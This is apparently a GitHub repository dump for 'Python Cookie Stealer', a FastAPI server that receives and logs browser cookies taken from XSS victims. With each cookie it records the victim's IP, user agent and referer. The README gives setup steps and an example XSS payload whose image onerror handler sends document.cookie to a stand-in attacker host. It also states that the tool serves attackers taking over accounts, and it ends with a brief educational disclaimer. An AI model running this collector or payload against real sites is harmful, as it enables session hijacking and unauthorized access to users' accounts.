├── .gitignore
├── CODE_OF_CONDUCT.md
├── CONTRIBUTING.md
├── LICENSE.md
├── README.md
├── cookies.txt
├── main.py
└── requirements.txt


/.gitignore:
--------------------------------------------------------------------------------
1 | __pycache__


--------------------------------------------------------------------------------
/CODE_OF_CONDUCT.md:
--------------------------------------------------------------------------------
 1 | # Contributor Code of Conduct
 2 | 
 3 | As a contributor to this project, we ask that you adhere to the following code of conduct:
 4 | 
 5 | 1. Be respectful and considerate of others, regardless of their race, gender, religion, or other personal characteristics.
 6 | 
 7 | 2. Avoid using derogatory or offensive language or behavior.
 8 | 
 9 | 3. Stay focused on the issues at hand and avoid personal attacks or ad hominem arguments.
10 | 
11 | 4. Be open to constructive feedback and willing to learn from others.
12 | 
13 | 5. Respect the privacy of others and avoid sharing personal information without their consent.
14 | 
15 | 6. Adhere to the project's guidelines and conventions for contributions.
16 | 
17 | 7. Help create a positive and supportive community by encouraging others and offering help when needed.
18 | 
19 | We take violations of this code of conduct seriously, and reserve the right to remove contributors who engage in inappropriate behavior. By contributing to this project, you agree to abide by this code of conduct and help create a safe and welcoming environment for all members of the community.


--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
 1 | # Contributing to Project
 2 | 
 3 | Thank you for your interest in contributing to Project! We welcome contributions from the community and appreciate any feedback or suggestions you may have.
 4 | 
 5 | ## Submitting Issues
 6 | 
 7 | If you encounter any issues with Project, please submit them through the project's [GitHub Issues](https://github.com/TheWation/PythonCookieStealer/issues) page. Please include as much detail as possible, including the steps to reproduce the issue and any error messages or logs.
 8 | 
 9 | ## Contributing Code
10 | 
11 | If you would like to contribute code to Project, please follow these steps:
12 | 
13 | 1. Fork the project repository to your own GitHub account.
14 | 
15 | 2. Create a new branch for your changes.
16 | 
17 | 3. Make your changes and commit them to your branch.
18 | 
19 | 4. Push your branch to your forked repository.
20 | 
21 | 5. Submit a pull request from your branch to the Project repository.
22 | 
23 | Please make sure to include a detailed description of your changes and why you think they are necessary. We also ask that you follow the project's coding standards and conventions.
24 | 
25 | Thank you for your contribution!


--------------------------------------------------------------------------------
/LICENSE.md:
--------------------------------------------------------------------------------
 1 | Copyright (c) 2012-2022 Scott Chacon and others
 2 | 
 3 | Permission is hereby granted, free of charge, to any person obtaining
 4 | a copy of this software and associated documentation files (the
 5 | "Software"), to deal in the Software without restriction, including
 6 | without limitation the rights to use, copy, modify, merge, publish,
 7 | distribute, sublicense, and/or sell copies of the Software, and to
 8 | permit persons to whom the Software is furnished to do so, subject to
 9 | the following conditions:
10 | 
11 | The above copyright notice and this permission notice shall be
12 | included in all copies or substantial portions of the Software.
13 | 
14 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
15 | EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
16 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
17 | NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
18 | LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
19 | OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
20 | WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Python Cookie Stealer
 2 | The Python cookie stealer is a tool that can be used in penetration testing and XSS attacks to steal browser cookies from victims. The tool works by setting up a server that listens for incoming requests with a specific cookie value. When a request is received, the tool logs various information about the request, including the date and time, client IP address, user agent, referer, and cookie value, to a file.
 3 | 
 4 | This tool can be used by attackers to steal sensitive information, such as session tokens and authentication credentials, from unsuspecting users. By stealing a user's browser cookies, an attacker can gain unauthorized access to the user's account and perform actions on their behalf.
 5 | 
 6 | ## Usage
 7 | 
 8 | 1. Clone Python Cookie Stealer Project
 9 | ```
10 | git clone https://github.com/TheWation/PythonCookieStealer
11 | ```
12 | 
13 | 2. Install Python and FastAPI on your machine if you haven't already. You can download the latest version of Python from the official website: https://www.python.org/downloads/ and install FastAPI using pip:
14 | 
15 | ```bash
16 | pip install fastapi
17 | ```
18 | 3. Install uvicorn, a lightning-fast ASGI server, using pip:
19 | 
20 | ```bash
21 | pip install uvicorn
22 | ```
23 | 
24 | 4. Create a new directory for your project and navigate into it using a terminal or command prompt.
25 | 
26 | 5. Create a new file called main.py and copy the FastAPI code into it.
27 | 
28 | 6. Start the FastAPI server by running the following command in the terminal or command prompt:
29 | 
30 | ```bash
31 | uvicorn main:app --reload
32 | ```
33 | 
34 | 7. In your web browser, visit http://localhost:8000/c/your-cookie-value, replacing your-cookie-value with the value of the cookie that you want to log. For example, if the cookie value is ABC123, you would visit http://localhost:8000/c/ABC123.
35 | 
36 | 8. The server will log the date and time, client IP address, user agent, referer, and cookie value to the cookies.txt file in the project directory.
37 | 
38 | ```
39 | [+] Date: 2022/10/03 15:30:45
40 | [+] IP: 127.0.0.1
41 | [+] UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36
42 | [+] Referer: http://localhost:8000/
43 | [+] Cookies: ABC123
44 | ---
45 | ```
46 | 
47 | 9. The server will also return a response with a status code of 200 if the request was successful, or a status code of 500 if there was an error writing to the file.
48 | 
49 | 10. You can repeat step 6 with different cookie values to log additional data to the file.
50 | 
51 | 11. To stop the server, press CTRL+C in the terminal where it is running.
52 | 
53 | ## Example Payload
54 | ```
55 | https://pentest.target/?name=<img src=x onerror=this.src='http://evil-website.com/c/'+document.cookie>
56 | ```
57 | 
58 | ## Disclaimer
59 | For educational purposes only. Do not use for illegal activities. Use at your own risk. By using this tool, you agree to comply with all applicable laws and regulations. Unauthorized use is strictly prohibited. Always obtain permission before using this tool. No warranties.
60 | 
61 | ## License
62 | 
63 | `WebSecurityVision` is made with ♥  by [Wation](https://github.com/TheWation) and it's released under the MIT license.


--------------------------------------------------------------------------------
/cookies.txt:
--------------------------------------------------------------------------------
1 | [+] Date: 2022/10/03 15:30:45
2 | [+] IP: 127.0.0.1
3 | [+] UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36
4 | [+] Referer: http://localhost:8000/
5 | [+] Cookies: ABC123
6 | ---


--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------
 1 | #  __     __     ______     ______   __     ______     __   __    
 2 | # /\ \  _ \ \   /\  __ \   /\__  _\ /\ \   /\  __ \   /\ "-.\ \   
 3 | # \ \ \/ ".\ \  \ \  __ \  \/_/\ \/ \ \ \  \ \ \/\ \  \ \ \-.  \  
 4 | #  \ \__/".~\_\  \ \_\ \_\    \ \_\  \ \_\  \ \_____\  \ \_\\"\_\ 
 5 | #   \/_/   \/_/   \/_/\/_/     \/_/   \/_/   \/_____/   \/_/ \/_/ 
 6 | #       https://github.com/TheWation/PythonCookieStealer
 7 | 
 8 | from fastapi import FastAPI, Request
 9 | from datetime import datetime
10 | app = FastAPI()
11 | 
12 | @app.get("/c/{cookie}")
13 | def read_root(cookie: str, request: Request):
14 |     with open(f'cookies.txt', 'a') as cookie_file:
15 |         time_str = datetime.now().strftime("%Y/%m/%d %H:%M:%S")
16 |         client_host = request.client.host
17 |         user_agent = request.headers.get("User-Agent")
18 |         referer = request.headers.get("Referer")
19 |         cookie_file.write(f'[+] Date: {time_str}\n[+] IP: {client_host}\n[+] UserAgent: {user_agent}\n[+] Referer: {referer}\n[+] Cookies: {cookie}\n---\n')
20 |     return {"status": 200}


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | fastapi
2 | pydantic
3 | uvicorn


--------------------------------------------------------------------------------